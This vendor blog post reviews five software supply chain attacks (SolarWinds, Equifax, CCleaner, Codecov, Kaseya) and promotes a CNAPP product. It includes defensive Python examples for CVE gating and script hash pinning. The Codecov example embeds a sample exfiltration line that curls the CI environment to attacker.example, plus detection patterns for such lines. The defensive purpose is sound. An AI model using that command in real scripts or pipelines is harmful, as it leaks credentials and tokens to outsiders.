Published on 01/24/2024
Last updated on 02/13/2024

5 Lessons learned from high-profile software supply chain attacks


A software application is not a monolith. In addition to the code you write for your application, you’re leaning on what may be hundreds of dependency packages and libraries. Each one of those libraries has its own set of dependencies and was built with deployment tools before being pushed to repositories to be made available to you. 

These components—and everything that went into them—collectively represent your software supply chain. They are valuable assets essential to your software development process. The proper functioning of your software application hinges on these dependencies. 

Here’s the scary news: Each one is also a potential point of compromise. 

Software supply chain attacks exploit vulnerabilities within a chain of dependencies to breach the entire system. Reports show supply chain attacks increased by over 200% from 2022 to 2023. Many exploitable vulnerabilities came from third-party and open-source dependencies.  

This article will examine several high-profile software supply chain attacks from recent years. We’ll cover how they hit their targets, the level of damage that resulted, and what key lessons we can learn from these incursions. 

Case Study #1: The SolarWinds Attack 

 

Beginning in September 2019, SolarWinds, a well-known network monitoring company, suffered one of the most significant cyberattacks in history, later known as the SUNBURST attack. The wide-ranging victims of the breach included financial services firms, military contractors known to employ highly competent cybersecurity teams, and numerous U.S. federal agencies and departments. 

 

How it happened 

 

SolarWinds had an IT monitoring platform called Orion. Rather than attacking Orion in the field, the attackers compromised the environment in which Orion was built and planted a backdoor (SUNBURST) into the product during the build, so the malicious code shipped inside legitimately signed Orion updates. Approximately 18,000 customer organizations downloaded a trojanized update, and the compromise had a cascading effect: the backdoor gave the threat actors a foothold from which to move laterally within victim networks and reach sensitive logs and data. 

 

FireEye, a cybersecurity company, discovered the backdoor in December 2020 while investigating an intrusion into its own network. You’ll recall that the intrusion into SolarWinds began in September 2019. The attack went undiscovered for over a year. 

 

Key lessons learned 

 

This incident triggered a paradigm shift in cybersecurity, pushing prominent corporations worldwide toward a zero trust architecture in which third-party vendors, and the software they ship, are no longer granted implicit trust on the network.  

 

The fact that so many victims failed to detect this breach flagged serious shortcomings in the cybersecurity solutions of the time. The backdoor carried a valid SolarWinds signature and arrived through the normal update channel, so signature checks and vendor allowlists did not stop it. What would have helped is real-time monitoring and anomaly detection of what trusted software actually does once deployed. 

 

Case Study #2: The Equifax Breach 

 

Equifax is one of the largest credit reporting agencies in the U.S. In 2017, it suffered a significant data breach, exposing the personal data of nearly 150 million Americans to malicious actors.  

 

The severity of this incident resulted in calls for increased regulatory scrutiny, data protection laws, and reforms around data privacy. In the aftermath, Equifax suffered a massive stock selloff, serving as a dire warning to industry leaders: Do better to safeguard the data of users. 

 

How it happened 

 

The culprit was a vulnerability in the Apache Struts Java framework (CVE-2017-5638) that allowed attackers to execute code on web servers running the framework by placing an expression in a crafted HTTP Content-Type header. Inadequate network segmentation then let the attackers move easily from one server to another, significantly increasing the severity of the breach. 

 

To make it even worse, Equifax stored credentials for other internal databases without encryption. The attackers retrieved them in plaintext and used them to reach additional data stores. 

 

This incident is a reminder that common vulnerabilities and exposures (CVEs) such as the Apache Struts flaw are abundant. Industry reports put the rate at as many as 50 new CVEs each day. It should come as no surprise that attackers scan for newly reported CVEs too, and rush to exploit them before defenders patch. 

 

The patch for the Apache Struts vulnerability was released in March 2017, and working exploits were circulating publicly within days. The breach occurred between May and July of that same year, which means Equifax went at least two months without applying a readily available fix. 

 

Key lessons learned 

 

All systems require security patching—early and often. Organizations need tools to scan applications for existing and newly discovered CVEs. These scans should happen during the continuous integration and continuous delivery (CI/CD) build process to ensure that vulnerable software dependencies never make it to a production environment. Along with this, enforcing segmentation policies across network infrastructures and encryption of sensitive data—such as user credentials and passwords—are non-negotiable security best practices. 
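The following is an added example, not code from the article or from any vendor's scanner, of the CI gate described above: parse the build's declared dependencies and block the build when one falls inside a published vulnerable range. The manifest format and the `com.example:fake-lib` advisory are constructed for illustration; the CVE-2017-5638 entry uses the affected Struts branches and fixed versions (2.3.32 and 2.5.10.1) that Apache published. Note that the version comparison pads shorter versions, so that 2.5.10 correctly sorts below the fix release 2.5.10.1.

```python
"""CI gate: fail the build when a declared dependency matches a known advisory.

Added example (not the article's or any vendor's code). In practice the advisory
feed is pulled from NVD/OSV on every build rather than hand-maintained.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Advisory:
    cve: str
    package: str        # "group:artifact" as in Maven coordinates
    affected_min: str   # inclusive lower bound of the vulnerable branch
    fixed_in: str       # first safe version on that branch (exclusive upper bound)


# Constructed advisory feed. The Struts ranges are Apache's published ones;
# the com.example entry is hypothetical.
ADVISORIES = [
    Advisory("CVE-2017-5638", "org.apache.struts:struts2-core", "2.3.5", "2.3.32"),
    Advisory("CVE-2017-5638", "org.apache.struts:struts2-core", "2.5", "2.5.10.1"),
    Advisory("CVE-0000-0001", "com.example:fake-lib", "1.0", "1.4.2"),
]


def parse_version(v):
    """Split '2.5.10.1' into (2, 5, 10, 1); a non-numeric component sorts lowest."""
    parts = []
    for p in v.split("."):
        m = re.match(r"(\d+)", p)
        parts.append(int(m.group(1)) if m else -1)
    return tuple(parts)


def version_lt(a, b):
    """True when a < b, padding the shorter tuple with zeros so 2.5.10 < 2.5.10.1."""
    ta, tb = parse_version(a), parse_version(b)
    n = max(len(ta), len(tb))
    return ta + (0,) * (n - len(ta)) < tb + (0,) * (n - len(tb))


def is_affected(adv, version):
    """affected_min <= version < fixed_in."""
    return (not version_lt(version, adv.affected_min)) and version_lt(version, adv.fixed_in)


def parse_manifest(text):
    """Parse 'group:artifact:version' lines (constructed format, one dependency per line)."""
    deps = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        group, artifact, version = line.split(":")
        deps[f"{group}:{artifact}"] = version
    return deps


def find_vulnerable(deps, advisories=ADVISORIES):
    """Return sorted (package, version, cve) for every dependency inside a vulnerable range."""
    hits = set()
    for adv in advisories:
        v = deps.get(adv.package)
        if v is not None and is_affected(adv, v):
            hits.add((adv.package, v, adv.cve))
    return sorted(hits)


def ci_gate(manifest_text):
    """Return (ok, findings); ok is False when the build must be blocked."""
    findings = find_vulnerable(parse_manifest(manifest_text))
    return (len(findings) == 0, findings)


# Constructed manifests: the first pins the last vulnerable Struts 2.5 release.
MANIFEST_VULNERABLE = """
org.apache.struts:struts2-core:2.5.10
com.example:fake-lib:1.4.2
"""
MANIFEST_PATCHED = """
org.apache.struts:struts2-core:2.5.10.1
com.example:fake-lib:1.4.2
"""

if __name__ == "__main__":
    for name, text in (("vulnerable", MANIFEST_VULNERABLE), ("patched", MANIFEST_PATCHED)):
        ok, findings = ci_gate(text)
        print(name, "PASS" if ok else "BLOCK", findings)
```

Wire `ci_gate` into the pipeline so that a non-empty findings list fails the job; the same check run against a deployed inventory, not only at build time, is what catches a dependency that became vulnerable after it shipped, which is exactly the window Equifax was exploited in.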

 

Case Study #3: The CCleaner Incident 

 

In September 2017, researchers discovered that attackers had compromised the build environment used to produce CCleaner, a popular system optimization tool. The malware was inserted during compilation, so an official release (version 5.33, published in August 2017) shipped with the implant embedded and signed with the vendor’s valid code-signing certificate. 

 

How it happened 

 

More than two million users worldwide downloaded the tainted version of CCleaner. The implant collected system information such as machine names, installed software, and MAC addresses and sent it to a command-and-control server; a second-stage payload was then delivered to a small number of machines at selected technology companies. Researchers at Cisco Talos detected the breach and informed Avast, which had recently acquired Piriform, the maker of CCleaner. Avast promptly halted distribution of the compromised version and released a clean update, urging users to install it as soon as possible. 

 

Key lessons learned 

 

This breach shows that a reputable vendor and a valid code signature do not prove a build is clean: the malicious version was signed with the vendor’s own certificate. Users should exercise caution when downloading or updating software and rely on anomaly detection that alerts on suspicious behavior of software components after installation, and vendors must protect the build environment itself, since that is where this attack was won. 
 

Case Study #4: The Codecov Breach 

 

Codecov is a popular tool among software developers that tracks how much of a codebase is covered by tests. Beginning in late January 2021, and undetected until April, Codecov suffered a breach that impacted over 23,000 organizations using the software, including prominent tech companies such as Twilio and HashiCorp. Many industry experts compared it to the SUNBURST attack. 

 

How it happened 

 

Attackers exploited an error in Codecov’s process for creating Docker images that let them extract a credential with permission to modify the Bash Uploader, a script that customers fetch and execute inside their CI/CD jobs. The modified script exported the CI job’s environment variables, which is where credentials and access tokens typically live, to a server the attackers controlled, harvesting secrets from numerous organizations relying on Codecov as their coverage tool.  

 

The incident highlighted the potential vulnerabilities in every tool integrated into a software project’s supply chain. Even seemingly non-critical tools like test coverage utilities can serve as entry points for attackers, because anything that runs inside a CI job runs with that job’s secrets. The Codecov breach also demonstrated how easily authentication credentials can fall into the wrong hands when a fetched script is executed without verifying it. 
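Below is an added example, not code from the article, from Codecov, or from any vendor, of the control that this incident made standard practice for scripts fetched into CI: compute the digest of the downloaded script and refuse to run it unless it matches a value pinned in the repository. A secondary tripwire flags shell lines that ship the whole environment over the network, the shape of the Codecov modification. The two script bodies, the pinned hash, and the host names coverage.example and attacker.example are constructed for illustration.

```python
"""Pin-and-verify guard for a third-party CI helper script.

Added example (not the article's, Codecov's, or any vendor's code).
"""
import hashlib
import hmac
import re

# The script a maintainer reviewed and pinned (constructed stand-in for a real uploader).
CLEAN_SCRIPT = b"""#!/usr/bin/env bash
set -euo pipefail
# upload coverage report
curl -sS -X POST --data-binary @coverage.xml https://coverage.example/upload
"""

# The same script with one appended line, modelled on the shape of the Codecov
# tampering: it posts the CI environment, where tokens live, to a third party.
TAMPERED_SCRIPT = CLEAN_SCRIPT + (
    b'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.example/upload\n'
)

# In real use this value is committed to the repo (or taken from a signed release
# manifest), never fetched from the same place as the script.
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT).hexdigest()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_pinned(script: bytes, pinned_hex: str) -> bool:
    """Constant-time comparison of the fetched script's digest against the pin."""
    return hmac.compare_digest(sha256_hex(script), pinned_hex)


# Secondary heuristic, independent of the pin: an environment dump on the same
# line as a network client. A tripwire, not a substitute for the hash check.
ENV_EXFIL = re.compile(rb"\$\(\s*env\s*\)|\bprintenv\b|\bexport\s+-p\b")
NETWORK_CLIENT = re.compile(rb"\b(curl|wget)\b")


def suspicious_lines(script: bytes):
    """Return 1-based line numbers where an env dump and a network client appear together."""
    hits = []
    for n, line in enumerate(script.splitlines(), start=1):
        if ENV_EXFIL.search(line) and NETWORK_CLIENT.search(line):
            hits.append(n)
    return hits


def decide(script: bytes, pinned_hex: str) -> str:
    """'run' only if the pin matches and nothing looks like exfiltration; otherwise 'block'."""
    if not verify_pinned(script, pinned_hex):
        return "block"
    if suspicious_lines(script):
        return "block"
    return "run"


if __name__ == "__main__":
    print("clean   :", decide(CLEAN_SCRIPT, PINNED_SHA256))
    print("tampered:", decide(TAMPERED_SCRIPT, PINNED_SHA256),
          "suspicious lines:", suspicious_lines(TAMPERED_SCRIPT))
```

The pin is the real control: a modified uploader fails the digest check before a single line of it runs, regardless of what was changed. The pattern match only adds a signal for a script you have not pinned yet, and it is trivially evadable, so treat it as a reason to look, not as proof of safety.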

 

Key lessons learned 

 

Given the large number of dependencies found in every software project, the early detection of a supply chain attack is critical. Organizations need mechanisms for early detection of unauthorized access attempts, allowing system administrators to respond to the threat rapidly.  

Tools that enforce zero trust and the principle of least privilege are essential. Credentials handed to a CI job should be short-lived and scoped to the single task at hand, so that even when they leak, attackers are limited in the scope of their actions.  

 

Case Study #5: The Kaseya VSA Cyberattack 

 

In July 2021, Kaseya, a software company specializing in network and system monitoring tools, detected a potential security incident on its remote computer management tool, Kaseya VSA.  

 

Kaseya released a statement advising customers to shut down on-premises VSA servers, and took its own SaaS servers offline, until it could release a patch. By then, attackers had already used VSA at dozens of Kaseya’s managed service provider customers to push ransomware to roughly 1,500 downstream businesses and issued ransom demands. The severity of the incident led to the highest involvement of the U.S. government, even requiring the president’s attention.  

 

How it happened 

 

The Kaseya VSA cyberattack chained several zero-day vulnerabilities in the on-premises VSA server, including an authentication bypass (CVE-2021-30116), to execute arbitrary commands on the server. The attackers then used VSA’s own agent management facility to deliver a malicious payload disguised as an update to the endpoints those servers managed, turning a remote management product into the distribution channel for ransomware. This breach resulted in widespread compromise of connected client systems. 

 

Key lessons learned 

 

In the aftermath of the attack, former employees publicly stated that Kaseya was warned of this potential vulnerability. Organizations must address how often they audit their systems for vulnerabilities, even seemingly trivial security issues.  

 

Organizations should use security tools that include vulnerability scanning and real-time monitoring to address these issues promptly. Enterprises must perform due diligence when integrating products from third-party vendors into their supply chain.   

 

Turn these lessons into action 

 

Supply chain attacks can spread swiftly across systems, exponentially multiplying their impact and causing extensive damage. The security of every software project depends on that of every node in its supply chain and environment. Addressing software supply chain security is critical for any organization with a digital presence.  

 

Cloud-native application protection platform (CNAPP) solutions have proven to be a reliable source of resilience in this domain. Along with cloud security posture management (CSPM), cloud infrastructure entitlements management (CIEM), and cloud workload protection (CWPP), a CNAPP provides the necessary features for protecting your software supply chain from attack: 

 

  • Automated vulnerability scanning during the build process and cross-referencing against CVE databases are critical for preventing breaches like Equifax suffered. 

  • Anomaly detection and real-time monitoring features are crucial in early detection for cases such as the SUNBURST and Codecov attacks. 

  • Generating and integrating a Software Bill of Materials (SBOM) is paramount for comprehensive visibility into software supply chains, enabling proactive vulnerability management and swift response.    

 

Organizations that do not use CNAPP solutions open the door for cybercriminals to exploit their software supply chain. The companies mentioned in this article all suffered serious reputational damage and loss of business revenue and market capitalization.  

 

In the end, the cost and effort of putting proactive cybersecurity measures in place is a drop in the bucket when compared to the substantial costs and damages incurred by a breach. 

 

For more information about Outshift's CNAPP solution, Panoptica, and how it can protect your software supply chain, schedule a one-on-one live demo or contact Outshift today. 
